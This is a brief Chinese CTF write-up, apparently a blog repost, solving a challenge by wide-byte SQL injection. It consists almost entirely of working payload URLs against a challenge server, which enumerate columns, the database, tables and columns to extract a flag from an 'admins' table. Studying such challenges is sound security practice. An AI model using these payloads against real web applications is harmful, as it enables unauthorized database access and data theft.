标签:bubuko limit flag admin auto ase sel .com width
SQL 注入的艺术
在源码看到gb2312,宽字节注入无疑
查字段
http://118.190.152.202:8015/index.php?id=1%df‘ order by 8%23
回显字段
http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,4,5,6,7,8%23
查库
http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,database(),5,6,7,8%23
爆表得admins
http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,table_name,5,6,7,8+from+information_schema.tables+where+table_schema=database()+limit+0,1%23
爆列名得flag列
http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e73+limit+7,1%23
拿flag
http://118.190.152.202:8015/index.php?id=-1%df‘ UNION SELECT 1,2,3,flag,5,6,7,8+from+admins%23
标签:bubuko limit flag admin auto ase sel .com width
原文地址:https://www.cnblogs.com/feicai/p/8983227.html